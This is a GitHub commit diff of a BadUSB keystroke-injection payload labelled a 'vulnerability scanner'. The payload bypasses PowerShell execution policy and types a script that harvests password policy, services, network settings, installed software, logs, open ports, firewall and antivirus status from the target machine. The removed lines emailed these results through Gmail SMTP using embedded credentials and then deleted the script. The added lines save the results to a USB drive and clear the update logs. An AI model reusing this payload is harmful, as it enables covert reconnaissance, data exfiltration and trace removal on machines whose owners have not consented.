Hardware-Hacking/BadUSB
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update 3.0. VulnerabilityScanner

Browse Source
This commit is contained in:
Mark
2024-05-20 17:09:53 -04:00
committed by GitHub
parent 8222a3eff3
commit a92fd2b38a
1 changed files with 495 additions and 219 deletions
Download Patch File Download Diff File Expand all files Collapse all files
3.0. VulnerabilityScanner
+421 -145
View File
@@ -1,4 +1,4 @@
REM script in progress
DELAY 1000
REM Open Start Menu
CONTROL ESCAPE
@@ -17,328 +17,604 @@ DELAY 5000
REM Set PowerShell Execution Policy to Bypass
DELAY 1000
STRING set-executionpolicy bypass -scope process -force
DELAY 100
DELAY 400
ENTER
DELAY 400
REM Create the PowerShell script in memory and execute it
DELAY 100
STRING $securepassword = convertto-securestring 'YourAppSpecificPassword' -asplaintext -force
DELAY 100
DELAY 400
STRING $usbName = "MYUSB"
DELAY 400
ENTER
DELAY 400
STRING $credential = new-object system.management.automation.pscredential ('igrowsc@gmail.com', $securepassword)
DELAY 100
STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
DELAY 400
ENTER
DELAY 400
STRING $script = {
DELAY 100
STRING if ($usbDrive) {
DELAY 400
ENTER
DELAY 400
STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
DELAY 400
ENTER
DELAY 400
STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
DELAY 400
ENTER
DELAY 400
STRING New-Item -ItemType Directory -Path $directoryPath
DELAY 400
ENTER
DELAY 400
STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
DELAY 400
ENTER
DELAY 400
STRING "" > $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING function check-passwordpolicy {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING net accounts
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking password policy: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function audit-services {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING get-service | select-object name, displayname, status, starttype
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error auditing services: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-networksettings {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING get-netipconfiguration
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking network settings: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-softwarevulnerabilities {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking software vulnerabilities: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-cve {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING param (
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING [string]$productname,
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING [string]$version
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING )
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING $initialDelay = 2
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING start-sleep -seconds 5
DELAY 100
STRING start-sleep -seconds $initialDelay
DELAY 400
ENTER
DELAY 400
STRING $response = invoke-restmethod -uri $uri -method get
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING if ($response.totalresults -gt 0) {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING foreach ($cve in $response.result.cve_items) {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } else {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING "no cves found for $productname $version"
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking CVEs: $_"
DELAY 400
ENTER
DELAY 400
STRING if ($_.Exception -match '403') {
DELAY 400
ENTER
DELAY 400
STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
DELAY 400
ENTER
DELAY 400
STRING start-sleep -seconds 60
DELAY 400
ENTER
DELAY 400
STRING $retryResponse = invoke-restmethod -uri $uri -method get
DELAY 400
ENTER
DELAY 400
STRING if ($retryResponse.totalresults -gt 0) {
DELAY 400
ENTER
DELAY 400
STRING foreach ($cve in $retryResponse.result.cve_items) {
DELAY 400
ENTER
DELAY 400
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } else {
DELAY 400
ENTER
DELAY 400
STRING "no cves found for $productname $version"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function analyze-logs {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING get-eventlog -logname system -newest 100
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error analyzing logs: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-openports {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING netstat -an
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking open ports: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-missingupdates {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING get-windowsupdatelog
DELAY 100
STRING try {
DELAY 400
ENTER
DELAY 400
STRING write-output "Checking Windows Update logs..."
DELAY 400
ENTER
DELAY 400
STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
DELAY 400
ENTER
DELAY 400
STRING Get-WindowsUpdateLog -LogPath $updateLogPath
DELAY 400
ENTER
DELAY 400
STRING write-output "WindowsUpdate.log written to $updateLogPath"
DELAY 400
ENTER
DELAY 400
STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error getting Windows Update log: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-firewallstatus {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING netsh advfirewall show allprofiles
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking firewall status: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-smbv1status {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING get-windowsoptionalfeature -online -featurename smb1protocol
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking SMBv1 status: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-antivirusstatus {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING get-mpcomputerstatus
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking antivirus status: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
STRING function send-emailandcleanup {
DELAY 100
ENTER
DELAY 400
STRING param (
DELAY 100
ENTER
DELAY 400
STRING [string]$smtpserver,
DELAY 100
ENTER
DELAY 400
STRING [string]$smtpfrom,
DELAY 100
ENTER
DELAY 400
STRING [string]$smtpto,
DELAY 100
ENTER
DELAY 400
STRING [string]$messagesubject,
DELAY 100
ENTER
DELAY 400
STRING [string]$messagebody,
DELAY 100
ENTER
DELAY 400
STRING [string]$attachmentpath,
DELAY 100
ENTER
DELAY 400
STRING [system.management.automation.pscredential]$credential
DELAY 100
ENTER
DELAY 400
STRING )
DELAY 100
ENTER
DELAY 400
STRING $smtp = new-object net.mail.smtpclient($smtpserver)
DELAY 100
ENTER
DELAY 400
STRING $smtp.credentials = $credential
DELAY 100
ENTER
DELAY 400
STRING $smtp.enablessl = $true
DELAY 100
ENTER
DELAY 400
STRING $smtp.send($smtpfrom, $smtpto, $messagesubject, $messagebody + (get-content -path $attachmentpath -raw))
DELAY 100
ENTER
DELAY 400
STRING remove-item -path $attachmentpath
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING check-passwordpolicy > results.txt
DELAY 100
STRING check-passwordpolicy >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING audit-services >> results.txt
DELAY 100
STRING audit-services >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING check-networksettings >> results.txt
DELAY 100
STRING check-networksettings >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING check-softwarevulnerabilities >> results.txt
DELAY 100
STRING check-softwarevulnerabilities >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING analyze-logs >> results.txt
DELAY 100
STRING analyze-logs >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING check-openports >> results.txt
DELAY 100
STRING check-openports >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING check-missingupdates >> results.txt
DELAY 100
STRING check-missingupdates >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING check-firewallstatus >> results.txt
DELAY 100
STRING check-firewallstatus >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING check-smbv1status >> results.txt
DELAY 100
STRING check-smbv1status >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING check-antivirusstatus >> results.txt
DELAY 100
STRING check-antivirusstatus >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | foreach-object { check-cve -productname $_.displayname -version $_.displayversion } >> results.txt
DELAY 100
REM Dynamically identify critical software from running processes and scheduled tasks
STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
DELAY 400
ENTER
DELAY 400
STRING send-emailandcleanup -smtpserver "smtp.gmail.com" -smtpfrom "igrowsc@gmail.com" -smtpto "igrowsc@gmail.com" -messagesubject "vulnerability scan results" -messagebody "attached are the results of the vulnerability scan." -attachmentpath "results.txt" -credential $credential
DELAY 100
STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
DELAY 400
ENTER
DELAY 400
STRING remove-item -path $myinvocation.mycommand.path
DELAY 100
REM Combine running software and scheduled tasks
STRING $softwareList = @()
DELAY 400
ENTER
DELAY 400
STRING foreach ($process in $runningSoftware) {
DELAY 400
ENTER
DELAY 400
STRING $softwareList += $process.Name
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING foreach ($task in $scheduledTasks) {
DELAY 400
ENTER
DELAY 400
STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
REM Remove duplicates and empty entries
STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
DELAY 400
ENTER
DELAY 400
REM Check CVEs for identified software
STRING foreach ($software in $softwareList) {
DELAY 400
ENTER
DELAY 400
STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
DELAY 400
ENTER
DELAY 400
STRING if ($version) {
DELAY 400
ENTER
DELAY 400
STRING check-cve -productname $software -version $version >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
DELAY 400
ENTER
DELAY 400
STRING start-sleep -seconds $initialDelay
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING write-output "Results saved to USB drive."
DELAY 400
ENTER
DELAY 400
STRING } else {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error: USB drive MYUSB not found."
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING invoke-command -scriptblock $script
DELAY 100
DELAY 400
ENTER
DELAY 20000